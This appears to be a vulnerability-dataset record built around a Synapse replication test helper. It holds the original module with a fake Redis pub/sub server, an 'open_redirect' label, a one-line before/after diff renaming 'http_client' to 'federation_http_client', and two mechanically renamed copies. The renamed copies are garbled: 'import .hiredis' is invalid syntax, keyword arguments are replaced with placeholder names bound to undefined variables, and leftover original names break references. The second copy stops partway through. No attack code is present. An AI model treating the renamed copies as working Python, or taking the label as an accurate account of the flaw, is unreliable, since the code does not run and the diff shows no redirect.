# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from typing import Any, Callable, List, Optional, Tuple
import attr
from twisted.internet.interfaces import IConsumer, IPullProducer, IReactorTime
from twisted.internet.protocol import Protocol
from twisted.internet.task import LoopingCall
from twisted.web.http import HTTPChannel
from synapse.app.generic_worker import (
GenericWorkerReplicationHandler,
GenericWorkerServer,
)
from synapse.http.server import JsonResource
from synapse.http.site import SynapseRequest, SynapseSite
from synapse.replication.http import ReplicationRestResource, streams
from synapse.replication.tcp.handler import ReplicationCommandHandler
from synapse.replication.tcp.protocol import ClientReplicationStreamProtocol
from synapse.replication.tcp.resource import ReplicationStreamProtocolFactory
from synapse.server import HomeServer
from synapse.util import Clock
from tests import unittest
from tests.server import FakeTransport
try:
import hiredis
except ImportError:
hiredis = None
logger = logging.getLogger(__name__)
class BaseStreamTestCase(unittest.HomeserverTestCase):
"""Base class for tests of the replication streams"""
# hiredis is an optional dependency so we don't want to require it for running
# the tests.
if not hiredis:
skip = "Requires hiredis"
servlets = [
streams.register_servlets,
]
def prepare(self, reactor, clock, hs):
# build a replication server
server_factory = ReplicationStreamProtocolFactory(hs)
self.streamer = hs.get_replication_streamer()
self.server = server_factory.buildProtocol(None)
# Make a new HomeServer object for the worker
self.reactor.lookups["testserv"] = "1.2.3.4"
self.worker_hs = self.setup_test_homeserver(
federation_http_client=None,
homeserver_to_use=GenericWorkerServer,
config=self._get_worker_hs_config(),
reactor=self.reactor,
)
# Since we use sqlite in memory databases we need to make sure the
# databases objects are the same.
self.worker_hs.get_datastore().db_pool = hs.get_datastore().db_pool
self.test_handler = self._build_replication_data_handler()
self.worker_hs._replication_data_handler = self.test_handler
repl_handler = ReplicationCommandHandler(self.worker_hs)
self.client = ClientReplicationStreamProtocol(
self.worker_hs, "client", "test", clock, repl_handler,
)
self._client_transport = None
self._server_transport = None
def _get_worker_hs_config(self) -> dict:
config = self.default_config()
config["worker_app"] = "synapse.app.generic_worker"
config["worker_replication_host"] = "testserv"
config["worker_replication_http_port"] = "8765"
return config
def _build_replication_data_handler(self):
return TestReplicationDataHandler(self.worker_hs)
def reconnect(self):
if self._client_transport:
self.client.close()
if self._server_transport:
self.server.close()
self._client_transport = FakeTransport(self.server, self.reactor)
self.client.makeConnection(self._client_transport)
self._server_transport = FakeTransport(self.client, self.reactor)
self.server.makeConnection(self._server_transport)
def disconnect(self):
if self._client_transport:
self._client_transport = None
self.client.close()
if self._server_transport:
self._server_transport = None
self.server.close()
def replicate(self):
"""Tell the master side of replication that something has happened, and then
wait for the replication to occur.
"""
self.streamer.on_notifier_poke()
self.pump(0.1)
def handle_http_replication_attempt(self) -> SynapseRequest:
"""Asserts that a connection attempt was made to the master HS on the
HTTP replication port, then proxies it to the master HS object to be
handled.
Returns:
The request object received by master HS.
"""
# We should have an outbound connection attempt.
clients = self.reactor.tcpClients
self.assertEqual(len(clients), 1)
(host, port, client_factory, _timeout, _bindAddress) = clients.pop(0)
self.assertEqual(host, "1.2.3.4")
self.assertEqual(port, 8765)
# Set up client side protocol
client_protocol = client_factory.buildProtocol(None)
request_factory = OneShotRequestFactory()
# Set up the server side protocol
channel = _PushHTTPChannel(self.reactor)
channel.requestFactory = request_factory
channel.site = self.site
# Connect client to server and vice versa.
client_to_server_transport = FakeTransport(
channel, self.reactor, client_protocol
)
client_protocol.makeConnection(client_to_server_transport)
server_to_client_transport = FakeTransport(
client_protocol, self.reactor, channel
)
channel.makeConnection(server_to_client_transport)
# The request will now be processed by `self.site` and the response
# streamed back.
self.reactor.advance(0)
# We tear down the connection so it doesn't get reused without our
# knowledge.
server_to_client_transport.loseConnection()
client_to_server_transport.loseConnection()
return request_factory.request
def assert_request_is_get_repl_stream_updates(
self, request: SynapseRequest, stream_name: str
):
"""Asserts that the given request is a HTTP replication request for
fetching updates for given stream.
"""
self.assertRegex(
request.path,
br"^/_synapse/replication/get_repl_stream_updates/%s/[^/]+$"
% (stream_name.encode("ascii"),),
)
self.assertEqual(request.method, b"GET")
class BaseMultiWorkerStreamTestCase(unittest.HomeserverTestCase):
"""Base class for tests running multiple workers.
Automatically handle HTTP replication requests from workers to master,
unlike `BaseStreamTestCase`.
"""
servlets = [] # type: List[Callable[[HomeServer, JsonResource], None]]
def setUp(self):
super().setUp()
# build a replication server
self.server_factory = ReplicationStreamProtocolFactory(self.hs)
self.streamer = self.hs.get_replication_streamer()
# Fake in memory Redis server that servers can connect to.
self._redis_server = FakeRedisPubSubServer()
store = self.hs.get_datastore()
self.database_pool = store.db_pool
self.reactor.lookups["testserv"] = "1.2.3.4"
self.reactor.lookups["localhost"] = "127.0.0.1"
# A map from a HS instance to the associated HTTP Site to use for
# handling inbound HTTP requests to that instance.
self._hs_to_site = {self.hs: self.site}
if self.hs.config.redis.redis_enabled:
# Handle attempts to connect to fake redis server.
self.reactor.add_tcp_client_callback(
"localhost", 6379, self.connect_any_redis_attempts,
)
self.hs.get_tcp_replication().start_replication(self.hs)
# When we see a connection attempt to the master replication listener we
# automatically set up the connection. This is so that tests don't
# manually have to go and explicitly set it up each time (plus sometimes
# it is impossible to write the handling explicitly in the tests).
#
# Register the master replication listener:
self.reactor.add_tcp_client_callback(
"1.2.3.4",
8765,
lambda: self._handle_http_replication_attempt(self.hs, 8765),
)
def create_test_resource(self):
"""Overrides `HomeserverTestCase.create_test_resource`.
"""
# We override this so that it automatically registers all the HTTP
# replication servlets, without having to explicitly do that in all
# subclassses.
resource = ReplicationRestResource(self.hs)
for servlet in self.servlets:
servlet(self.hs, resource)
return resource
def make_worker_hs(
self, worker_app: str, extra_config: dict = {}, **kwargs
) -> HomeServer:
"""Make a new worker HS instance, correctly connecting replcation
stream to the master HS.
Args:
worker_app: Type of worker, e.g. `synapse.app.federation_sender`.
extra_config: Any extra config to use for this instances.
**kwargs: Options that get passed to `self.setup_test_homeserver`,
useful to e.g. pass some mocks for things like `federation_http_client`
Returns:
The new worker HomeServer instance.
"""
config = self._get_worker_hs_config()
config["worker_app"] = worker_app
config.update(extra_config)
worker_hs = self.setup_test_homeserver(
homeserver_to_use=GenericWorkerServer,
config=config,
reactor=self.reactor,
**kwargs,
)
# If the instance is in the `instance_map` config then workers may try
# and send HTTP requests to it, so we register it with
# `_handle_http_replication_attempt` like we do with the master HS.
instance_name = worker_hs.get_instance_name()
instance_loc = worker_hs.config.worker.instance_map.get(instance_name)
if instance_loc:
# Ensure the host is one that has a fake DNS entry.
if instance_loc.host not in self.reactor.lookups:
raise Exception(
"Host does not have an IP for instance_map[%r].host = %r"
% (instance_name, instance_loc.host,)
)
self.reactor.add_tcp_client_callback(
self.reactor.lookups[instance_loc.host],
instance_loc.port,
lambda: self._handle_http_replication_attempt(
worker_hs, instance_loc.port
),
)
store = worker_hs.get_datastore()
store.db_pool._db_pool = self.database_pool._db_pool
# Set up TCP replication between master and the new worker if we don't
# have Redis support enabled.
if not worker_hs.config.redis_enabled:
repl_handler = ReplicationCommandHandler(worker_hs)
client = ClientReplicationStreamProtocol(
worker_hs, "client", "test", self.clock, repl_handler,
)
server = self.server_factory.buildProtocol(None)
client_transport = FakeTransport(server, self.reactor)
client.makeConnection(client_transport)
server_transport = FakeTransport(client, self.reactor)
server.makeConnection(server_transport)
# Set up a resource for the worker
resource = ReplicationRestResource(worker_hs)
for servlet in self.servlets:
servlet(worker_hs, resource)
self._hs_to_site[worker_hs] = SynapseSite(
logger_name="synapse.access.http.fake",
site_tag="{}-{}".format(
worker_hs.config.server.server_name, worker_hs.get_instance_name()
),
config=worker_hs.config.server.listeners[0],
resource=resource,
server_version_string="1",
)
if worker_hs.config.redis.redis_enabled:
worker_hs.get_tcp_replication().start_replication(worker_hs)
return worker_hs
def _get_worker_hs_config(self) -> dict:
config = self.default_config()
config["worker_replication_host"] = "testserv"
config["worker_replication_http_port"] = "8765"
return config
def replicate(self):
"""Tell the master side of replication that something has happened, and then
wait for the replication to occur.
"""
self.streamer.on_notifier_poke()
self.pump()
def _handle_http_replication_attempt(self, hs, repl_port):
"""Handles a connection attempt to the given HS replication HTTP
listener on the given port.
"""
# We should have at least one outbound connection attempt, where the
# last is one to the HTTP repication IP/port.
clients = self.reactor.tcpClients
self.assertGreaterEqual(len(clients), 1)
(host, port, client_factory, _timeout, _bindAddress) = clients.pop()
self.assertEqual(host, "1.2.3.4")
self.assertEqual(port, repl_port)
# Set up client side protocol
client_protocol = client_factory.buildProtocol(None)
request_factory = OneShotRequestFactory()
# Set up the server side protocol
channel = _PushHTTPChannel(self.reactor)
channel.requestFactory = request_factory
channel.site = self._hs_to_site[hs]
# Connect client to server and vice versa.
client_to_server_transport = FakeTransport(
channel, self.reactor, client_protocol
)
client_protocol.makeConnection(client_to_server_transport)
server_to_client_transport = FakeTransport(
client_protocol, self.reactor, channel
)
channel.makeConnection(server_to_client_transport)
# Note: at this point we've wired everything up, but we need to return
# before the data starts flowing over the connections as this is called
# inside `connecTCP` before the connection has been passed back to the
# code that requested the TCP connection.
def connect_any_redis_attempts(self):
"""If redis is enabled we need to deal with workers connecting to a
redis server. We don't want to use a real Redis server so we use a
fake one.
"""
clients = self.reactor.tcpClients
self.assertEqual(len(clients), 1)
(host, port, client_factory, _timeout, _bindAddress) = clients.pop(0)
self.assertEqual(host, "localhost")
self.assertEqual(port, 6379)
client_protocol = client_factory.buildProtocol(None)
server_protocol = self._redis_server.buildProtocol(None)
client_to_server_transport = FakeTransport(
server_protocol, self.reactor, client_protocol
)
client_protocol.makeConnection(client_to_server_transport)
server_to_client_transport = FakeTransport(
client_protocol, self.reactor, server_protocol
)
server_protocol.makeConnection(server_to_client_transport)
return client_to_server_transport, server_to_client_transport
class TestReplicationDataHandler(GenericWorkerReplicationHandler):
"""Drop-in for ReplicationDataHandler which just collects RDATA rows"""
def __init__(self, hs: HomeServer):
super().__init__(hs)
# list of received (stream_name, token, row) tuples
self.received_rdata_rows = [] # type: List[Tuple[str, int, Any]]
async def on_rdata(self, stream_name, instance_name, token, rows):
await super().on_rdata(stream_name, instance_name, token, rows)
for r in rows:
self.received_rdata_rows.append((stream_name, token, r))
@attr.s()
class OneShotRequestFactory:
"""A simple request factory that generates a single `SynapseRequest` and
stores it for future use. Can only be used once.
"""
request = attr.ib(default=None)
def __call__(self, *args, **kwargs):
assert self.request is None
self.request = SynapseRequest(*args, **kwargs)
return self.request
class _PushHTTPChannel(HTTPChannel):
"""A HTTPChannel that wraps pull producers to push producers.
This is a hack to get around the fact that HTTPChannel transparently wraps a
pull producer (which is what Synapse uses to reply to requests) with
`_PullToPush` to convert it to a push producer. Unfortunately `_PullToPush`
uses the standard reactor rather than letting us use our test reactor, which
makes it very hard to test.
"""
def __init__(self, reactor: IReactorTime):
super().__init__()
self.reactor = reactor
self._pull_to_push_producer = None # type: Optional[_PullToPushProducer]
def registerProducer(self, producer, streaming):
# Convert pull producers to push producer.
if not streaming:
self._pull_to_push_producer = _PullToPushProducer(
self.reactor, producer, self
)
producer = self._pull_to_push_producer
super().registerProducer(producer, True)
def unregisterProducer(self):
if self._pull_to_push_producer:
# We need to manually stop the _PullToPushProducer.
self._pull_to_push_producer.stop()
def checkPersistence(self, request, version):
"""Check whether the connection can be re-used
"""
# We hijack this to always say no for ease of wiring stuff up in
# `handle_http_replication_attempt`.
request.responseHeaders.setRawHeaders(b"connection", [b"close"])
return False
class _PullToPushProducer:
    """Adapts a pull producer so that it behaves like a push producer.

    A zero-interval looping call on the supplied (test) reactor repeatedly
    invokes ``resumeProducing`` on the wrapped pull producer until this
    adapter is paused or stopped.
    """

    def __init__(
        self, reactor: IReactorTime, producer: IPullProducer, consumer: IConsumer
    ):
        self._clock = Clock(reactor)
        self._producer = producer
        self._consumer = consumer

        # Zero-delay looping call that drives the pull producer; None while
        # we are paused/stopped.
        self._looping_call = None  # type: Optional[LoopingCall]

        # Kick off production on the next reactor tick.
        self._start_loop()

    def _start_loop(self):
        """Begin the looping call that pulls from the producer, if not running."""
        if self._looping_call is None:
            self._looping_call = self._clock.looping_call(self._run_once, 0)

    def stop(self):
        """Cancel the looping call, i.e. stop calling ``resumeProducing``."""
        if self._looping_call is not None:
            self._looping_call.stop()
        self._looping_call = None

    def pauseProducing(self):
        """Implements ``IPushProducer``."""
        self.stop()

    def resumeProducing(self):
        """Implements ``IPushProducer``."""
        self._start_loop()

    def stopProducing(self):
        """Implements ``IPushProducer``."""
        self.stop()
        self._producer.stopProducing()

    def _run_once(self):
        """Pull once from the wrapped producer; tear everything down on failure."""
        try:
            self._producer.resumeProducing()
            return
        except Exception:
            logger.exception("Failed to call resumeProducing")

        # The producer blew up: detach it from the consumer (best effort)
        # and shut ourselves down.
        try:
            self._consumer.unregisterProducer()
        except Exception:
            pass

        self.stopProducing()
class FakeRedisPubSubServer:
    """A minimal in-memory stand-in for a Redis pub/sub server."""

    def __init__(self):
        # Connections that have SUBSCRIBEd and not yet gone away.
        self._subscribers = set()

    def add_subscriber(self, conn):
        """Record that *conn* has issued SUBSCRIBE."""
        self._subscribers.add(conn)

    def remove_subscriber(self, conn):
        """Record that *conn* has issued UNSUBSCRIBE (or disconnected)."""
        self._subscribers.discard(conn)

    def publish(self, conn, channel, msg) -> int:
        """Deliver *msg* on *channel* to every subscriber.

        Returns the number of subscribers the message was sent to, mirroring
        the integer reply of the real Redis PUBLISH command.
        """
        subscribers = self._subscribers
        for subscriber in subscribers:
            subscriber.send(["message", channel, msg])

        return len(subscribers)

    def buildProtocol(self, addr):
        """Factory hook: create a protocol for a new client connection."""
        return FakeRedisPubSubProtocol(self)
class FakeRedisPubSubProtocol(Protocol):
    """One client connection talking to the fake Redis server."""

    def __init__(self, server: FakeRedisPubSubServer):
        self._server = server
        self._reader = hiredis.Reader()

    def dataReceived(self, data):
        """Feed *data* to the RESP parser and dispatch any complete commands."""
        self._reader.feed(data)

        # A single packet may carry several complete commands.
        msg = self._reader.gets()
        while msg is not False:
            if not isinstance(msg, list):
                # Commands from a client always arrive as RESP arrays.
                raise Exception("Expected redis list")

            self.handle_command(msg[0], *msg[1:])
            msg = self._reader.gets()

    def handle_command(self, command, *args):
        """Handle one parsed Redis command from the client.

        Only the pub/sub subset (PUBLISH / SUBSCRIBE) is implemented.
        """
        if command == b"PUBLISH":
            channel, message = args
            self.send(self._server.publish(self, channel, message))
        elif command == b"SUBSCRIBE":
            (channel,) = args
            self._server.add_subscriber(self)
            self.send(["subscribe", channel, 1])
        else:
            raise Exception("Unknown command")

    def send(self, msg):
        """Encode *msg* and write it back to the client."""
        self.transport.write(self.encode(msg).encode("utf-8"))
        self.transport.flush()

    def encode(self, obj):
        """Render *obj* in the Redis wire format.

        Supports: strings/bytes, integers and list/tuples.
        """
        if isinstance(obj, bytes):
            # Bytes are assumed to be UTF-8 encoded text.
            obj = obj.decode("utf-8")

        if isinstance(obj, str):
            return "${}\r\n{}\r\n".format(len(obj), obj)
        elif isinstance(obj, int):
            return ":{}\r\n".format(obj)
        elif isinstance(obj, (list, tuple)):
            encoded = [self.encode(item) for item in obj]
            return "*{}\r\n{}".format(len(obj), "".join(encoded))

        raise Exception("Unrecognized type for encoding redis: %r: %r", type(obj), obj)

    def connectionLost(self, reason):
        """Drop this connection's subscription when it goes away."""
        self._server.remove_subscriber(self)
| open_redirect | {
"code": [
" http_client=None,"
],
"line_no": [
70
]
} | {
"code": [
" federation_http_client=None,"
],
"line_no": [
70
]
} |
import logging
from typing import Any, Callable, List, Optional, Tuple
import attr
from twisted.internet.interfaces import IConsumer, IPullProducer, IReactorTime
from twisted.internet.protocol import Protocol
from twisted.internet.task import LoopingCall
from twisted.web.http import HTTPChannel
from synapse.app.generic_worker import (
GenericWorkerReplicationHandler,
GenericWorkerServer,
)
from synapse.http.server import JsonResource
from synapse.http.site import SynapseRequest, SynapseSite
from synapse.replication.http import ReplicationRestResource, streams
from synapse.replication.tcp.handler import ReplicationCommandHandler
from synapse.replication.tcp.protocol import ClientReplicationStreamProtocol
from synapse.replication.tcp.resource import ReplicationStreamProtocolFactory
from synapse.server import HomeServer
from synapse.util import Clock
from tests import unittest
from tests.server import FakeTransport
try:
import .hiredis
except ImportError:
VAR_28 = None
VAR_0 = logging.getLogger(__name__)
class CLASS_0(unittest.HomeserverTestCase):
if not VAR_28:
VAR_29 = "Requires hiredis"
VAR_1 = [
streams.register_servlets,
]
def FUNC_0(self, VAR_2, VAR_3, VAR_4):
VAR_30 = ReplicationStreamProtocolFactory(VAR_4)
self.streamer = VAR_4.get_replication_streamer()
self.server = VAR_30.buildProtocol(None)
self.reactor.lookups["testserv"] = "1.2.3.4"
self.worker_hs = self.setup_test_homeserver(
http_client=None,
homeserver_to_use=GenericWorkerServer,
VAR_32=self._get_worker_hs_config(),
VAR_2=self.reactor,
)
self.worker_hs.get_datastore().db_pool = VAR_4.get_datastore().db_pool
self.test_handler = self._build_replication_data_handler()
self.worker_hs._replication_data_handler = self.test_handler
VAR_31 = ReplicationCommandHandler(self.worker_hs)
self.client = ClientReplicationStreamProtocol(
self.worker_hs, "client", "test", VAR_3, VAR_31,
)
self._client_transport = None
self._server_transport = None
def FUNC_1(self) -> dict:
VAR_32 = self.default_config()
VAR_32["worker_app"] = "synapse.app.generic_worker"
VAR_32["worker_replication_host"] = "testserv"
VAR_32["worker_replication_http_port"] = "8765"
return VAR_32
def FUNC_2(self):
return CLASS_2(self.worker_hs)
def FUNC_3(self):
if self._client_transport:
self.client.close()
if self._server_transport:
self.server.close()
self._client_transport = FakeTransport(self.server, self.reactor)
self.client.makeConnection(self._client_transport)
self._server_transport = FakeTransport(self.client, self.reactor)
self.server.makeConnection(self._server_transport)
def FUNC_4(self):
if self._client_transport:
self._client_transport = None
self.client.close()
if self._server_transport:
self._server_transport = None
self.server.close()
def FUNC_5(self):
self.streamer.on_notifier_poke()
self.pump(0.1)
def FUNC_6(self) -> SynapseRequest:
VAR_33 = self.reactor.tcpClients
self.assertEqual(len(VAR_33), 1)
(VAR_34, VAR_35, VAR_36, VAR_37, VAR_38) = VAR_33.pop(0)
self.assertEqual(VAR_34, "1.2.3.4")
self.assertEqual(VAR_35, 8765)
VAR_39 = VAR_36.buildProtocol(None)
VAR_40 = CLASS_3()
VAR_20 = CLASS_4(self.reactor)
VAR_20.requestFactory = VAR_40
VAR_20.site = self.site
VAR_41 = FakeTransport(
VAR_20, self.reactor, VAR_39
)
client_protocol.makeConnection(VAR_41)
VAR_42 = FakeTransport(
VAR_39, self.reactor, VAR_20
)
VAR_20.makeConnection(VAR_42)
self.reactor.advance(0)
VAR_42.loseConnection()
VAR_41.loseConnection()
return VAR_40.request
def FUNC_7(
self, VAR_5: SynapseRequest, VAR_6: str
):
self.assertRegex(
VAR_5.path,
br"^/_synapse/replication/get_repl_stream_updates/%s/[^/]+$"
% (VAR_6.encode("ascii"),),
)
self.assertEqual(VAR_5.method, b"GET")
class CLASS_1(unittest.HomeserverTestCase):
VAR_1 = [] # type: List[Callable[[HomeServer, JsonResource], None]]
def FUNC_8(self):
super().setUp()
self.server_factory = ReplicationStreamProtocolFactory(self.hs)
self.streamer = self.hs.get_replication_streamer()
self._redis_server = CLASS_6()
VAR_43 = self.hs.get_datastore()
self.database_pool = VAR_43.db_pool
self.reactor.lookups["testserv"] = "1.2.3.4"
self.reactor.lookups["localhost"] = "127.0.0.1"
self._hs_to_site = {self.hs: self.site}
if self.hs.config.redis.redis_enabled:
self.reactor.add_tcp_client_callback(
"localhost", 6379, self.connect_any_redis_attempts,
)
self.hs.get_tcp_replication().start_replication(self.hs)
self.reactor.add_tcp_client_callback(
"1.2.3.4",
8765,
lambda: self._handle_http_replication_attempt(self.hs, 8765),
)
def FUNC_9(self):
VAR_44 = ReplicationRestResource(self.hs)
for servlet in self.servlets:
servlet(self.hs, VAR_44)
return VAR_44
def FUNC_10(
self, VAR_7: str, VAR_8: dict = {}, **VAR_9
) -> HomeServer:
VAR_32 = self._get_worker_hs_config()
VAR_32["worker_app"] = VAR_7
VAR_32.update(VAR_8)
VAR_45 = self.setup_test_homeserver(
homeserver_to_use=GenericWorkerServer,
VAR_32=config,
VAR_2=self.reactor,
**VAR_9,
)
VAR_11 = VAR_45.get_instance_name()
VAR_46 = VAR_45.config.worker.instance_map.get(VAR_11)
if VAR_46:
if VAR_46.host not in self.reactor.lookups:
raise Exception(
"Host does not have an IP for instance_map[%r].host = %r"
% (VAR_11, VAR_46.host,)
)
self.reactor.add_tcp_client_callback(
self.reactor.lookups[VAR_46.host],
VAR_46.port,
lambda: self._handle_http_replication_attempt(
VAR_45, VAR_46.port
),
)
VAR_43 = VAR_45.get_datastore()
VAR_43.db_pool._db_pool = self.database_pool._db_pool
if not VAR_45.config.redis_enabled:
VAR_31 = ReplicationCommandHandler(VAR_45)
VAR_49 = ClientReplicationStreamProtocol(
VAR_45, "client", "test", self.clock, VAR_31,
)
VAR_23 = self.server_factory.buildProtocol(None)
VAR_50 = FakeTransport(VAR_23, self.reactor)
VAR_49.makeConnection(VAR_50)
VAR_51 = FakeTransport(VAR_49, self.reactor)
VAR_23.makeConnection(VAR_51)
VAR_44 = ReplicationRestResource(VAR_45)
for servlet in self.servlets:
servlet(VAR_45, VAR_44)
self._hs_to_site[VAR_45] = SynapseSite(
logger_name="synapse.access.http.fake",
site_tag="{}-{}".format(
VAR_45.config.server.server_name, VAR_45.get_instance_name()
),
VAR_32=VAR_45.config.server.listeners[0],
VAR_44=resource,
server_version_string="1",
)
if VAR_45.config.redis.redis_enabled:
VAR_45.get_tcp_replication().start_replication(VAR_45)
return VAR_45
def FUNC_1(self) -> dict:
VAR_32 = self.default_config()
VAR_32["worker_replication_host"] = "testserv"
VAR_32["worker_replication_http_port"] = "8765"
return VAR_32
def FUNC_5(self):
self.streamer.on_notifier_poke()
self.pump()
def FUNC_11(self, VAR_4, VAR_10):
VAR_33 = self.reactor.tcpClients
self.assertGreaterEqual(len(VAR_33), 1)
(VAR_34, VAR_35, VAR_36, VAR_37, VAR_38) = VAR_33.pop()
self.assertEqual(VAR_34, "1.2.3.4")
self.assertEqual(VAR_35, VAR_10)
VAR_39 = VAR_36.buildProtocol(None)
VAR_40 = CLASS_3()
VAR_20 = CLASS_4(self.reactor)
VAR_20.requestFactory = VAR_40
VAR_20.site = self._hs_to_site[VAR_4]
VAR_41 = FakeTransport(
VAR_20, self.reactor, VAR_39
)
client_protocol.makeConnection(VAR_41)
VAR_42 = FakeTransport(
VAR_39, self.reactor, VAR_20
)
VAR_20.makeConnection(VAR_42)
def FUNC_12(self):
VAR_33 = self.reactor.tcpClients
self.assertEqual(len(VAR_33), 1)
(VAR_34, VAR_35, VAR_36, VAR_37, VAR_38) = VAR_33.pop(0)
self.assertEqual(VAR_34, "localhost")
self.assertEqual(VAR_35, 6379)
VAR_39 = VAR_36.buildProtocol(None)
VAR_47 = self._redis_server.buildProtocol(None)
VAR_41 = FakeTransport(
VAR_47, self.reactor, VAR_39
)
client_protocol.makeConnection(VAR_41)
VAR_42 = FakeTransport(
VAR_39, self.reactor, VAR_47
)
server_protocol.makeConnection(VAR_42)
return VAR_41, VAR_42
class CLASS_2(GenericWorkerReplicationHandler):
def __init__(self, VAR_4: HomeServer):
super().__init__(VAR_4)
self.received_rdata_rows = [] # type: List[Tuple[str, int, Any]]
async def FUNC_13(self, VAR_6, VAR_11, VAR_12, VAR_13):
await super().on_rdata(VAR_6, VAR_11, VAR_12, VAR_13)
for r in VAR_13:
self.received_rdata_rows.append((VAR_6, VAR_12, r))
@attr.s()
class CLASS_3:
VAR_5 = attr.ib(default=None)
def __call__(self, *VAR_14, **VAR_9):
assert self.request is None
self.request = SynapseRequest(*VAR_14, **VAR_9)
return self.request
class CLASS_4(HTTPChannel):
def __init__(self, VAR_2: IReactorTime):
super().__init__()
self.reactor = VAR_2
self._pull_to_push_producer = None # type: Optional[CLASS_5]
def FUNC_14(self, VAR_15, VAR_16):
if not VAR_16:
self._pull_to_push_producer = CLASS_5(
self.reactor, VAR_15, self
)
VAR_15 = self._pull_to_push_producer
super().registerProducer(VAR_15, True)
def FUNC_15(self):
if self._pull_to_push_producer:
self._pull_to_push_producer.stop()
def FUNC_16(self, VAR_5, VAR_17):
VAR_5.responseHeaders.setRawHeaders(b"connection", [b"close"])
return False
class CLASS_5:
def __init__(
self, VAR_2: IReactorTime, VAR_15: IPullProducer, VAR_18: IConsumer
):
self._clock = Clock(VAR_2)
self._producer = VAR_15
self._consumer = VAR_18
self._looping_call = None # type: Optional[LoopingCall]
self._start_loop()
def FUNC_17(self):
if not self._looping_call:
self._looping_call = self._clock.looping_call(self._run_once, 0)
def FUNC_18(self):
if self._looping_call:
self._looping_call.stop()
self._looping_call = None
def FUNC_19(self):
self.stop()
def FUNC_20(self):
self._start_loop()
def FUNC_21(self):
self.stop()
self._producer.stopProducing()
def FUNC_22(self):
try:
self._producer.resumeProducing()
except Exception:
VAR_0.exception("Failed to call resumeProducing")
try:
self._consumer.unregisterProducer()
except Exception:
pass
self.stopProducing()
class CLASS_6:
def __init__(self):
self._subscribers = set()
def FUNC_23(self, VAR_19):
self._subscribers.add(VAR_19)
def FUNC_24(self, VAR_19):
self._subscribers.discard(VAR_19)
def FUNC_25(self, VAR_19, VAR_20, VAR_21) -> int:
for sub in self._subscribers:
sub.send(["message", VAR_20, VAR_21])
return len(self._subscribers)
def FUNC_26(self, VAR_22):
return CLASS_7(self)
class CLASS_7(Protocol):
def __init__(self, VAR_23: CLASS_6):
self._server = VAR_23
self._reader = VAR_28.Reader()
def FUNC_27(self, VAR_24):
self._reader.feed(VAR_24)
while True:
VAR_21 = self._reader.gets()
if VAR_21 is False:
return
if not isinstance(VAR_21, list):
raise Exception("Expected redis list")
self.handle_command(VAR_21[0], *VAR_21[1:])
def FUNC_28(self, VAR_25, *VAR_14):
if VAR_25 == b"PUBLISH":
VAR_20, VAR_52 = VAR_14
VAR_53 = self._server.publish(self, VAR_20, VAR_52)
self.send(VAR_53)
elif VAR_25 == b"SUBSCRIBE":
(VAR_20,) = VAR_14
self._server.add_subscriber(self)
self.send(["subscribe", VAR_20, 1])
else:
raise Exception("Unknown command")
def FUNC_29(self, VAR_21):
VAR_48 = self.encode(VAR_21).encode("utf-8")
self.transport.write(VAR_48)
self.transport.flush()
def FUNC_30(self, VAR_26):
if isinstance(VAR_26, bytes):
VAR_26 = obj.decode("utf-8")
if isinstance(VAR_26, str):
return "${len}\r\n{str}\r\n".format(len=len(VAR_26), str=VAR_26)
if isinstance(VAR_26, int):
return ":{val}\r\n".format(val=VAR_26)
if isinstance(VAR_26, (list, tuple)):
VAR_54 = "".join(self.encode(a) for a in VAR_26)
return "*{len}\r\n{VAR_54}".format(len=len(VAR_26), VAR_54=items)
raise Exception("Unrecognized type for encoding redis: %r: %r", type(VAR_26), obj)
def FUNC_31(self, VAR_27):
self._server.remove_subscriber(self)
|
import logging
from typing import Any, Callable, List, Optional, Tuple
import attr
from twisted.internet.interfaces import IConsumer, IPullProducer, IReactorTime
from twisted.internet.protocol import Protocol
from twisted.internet.task import LoopingCall
from twisted.web.http import HTTPChannel
from synapse.app.generic_worker import (
GenericWorkerReplicationHandler,
GenericWorkerServer,
)
from synapse.http.server import JsonResource
from synapse.http.site import SynapseRequest, SynapseSite
from synapse.replication.http import ReplicationRestResource, streams
from synapse.replication.tcp.handler import ReplicationCommandHandler
from synapse.replication.tcp.protocol import ClientReplicationStreamProtocol
from synapse.replication.tcp.resource import ReplicationStreamProtocolFactory
from synapse.server import HomeServer
from synapse.util import Clock
from tests import unittest
from tests.server import FakeTransport
try:
import .hiredis
except ImportError:
VAR_28 = None
VAR_0 = logging.getLogger(__name__)
class CLASS_0(unittest.HomeserverTestCase):
if not VAR_28:
VAR_29 = "Requires hiredis"
VAR_1 = [
streams.register_servlets,
]
def FUNC_0(self, VAR_2, VAR_3, VAR_4):
VAR_30 = ReplicationStreamProtocolFactory(VAR_4)
self.streamer = VAR_4.get_replication_streamer()
self.server = VAR_30.buildProtocol(None)
self.reactor.lookups["testserv"] = "1.2.3.4"
self.worker_hs = self.setup_test_homeserver(
federation_http_client=None,
homeserver_to_use=GenericWorkerServer,
VAR_32=self._get_worker_hs_config(),
VAR_2=self.reactor,
)
self.worker_hs.get_datastore().db_pool = VAR_4.get_datastore().db_pool
self.test_handler = self._build_replication_data_handler()
self.worker_hs._replication_data_handler = self.test_handler
VAR_31 = ReplicationCommandHandler(self.worker_hs)
self.client = ClientReplicationStreamProtocol(
self.worker_hs, "client", "test", VAR_3, VAR_31,
)
self._client_transport = None
self._server_transport = None
def FUNC_1(self) -> dict:
VAR_32 = self.default_config()
VAR_32["worker_app"] = "synapse.app.generic_worker"
VAR_32["worker_replication_host"] = "testserv"
VAR_32["worker_replication_http_port"] = "8765"
return VAR_32
def FUNC_2(self):
return CLASS_2(self.worker_hs)
def FUNC_3(self):
if self._client_transport:
self.client.close()
if self._server_transport:
self.server.close()
self._client_transport = FakeTransport(self.server, self.reactor)
self.client.makeConnection(self._client_transport)
self._server_transport = FakeTransport(self.client, self.reactor)
self.server.makeConnection(self._server_transport)
def FUNC_4(self):
if self._client_transport:
self._client_transport = None
self.client.close()
if self._server_transport:
self._server_transport = None
self.server.close()
def FUNC_5(self):
self.streamer.on_notifier_poke()
self.pump(0.1)
def FUNC_6(self) -> SynapseRequest:
VAR_33 = self.reactor.tcpClients
self.assertEqual(len(VAR_33), 1)
(VAR_34, VAR_35, VAR_36, VAR_37, VAR_38) = VAR_33.pop(0)
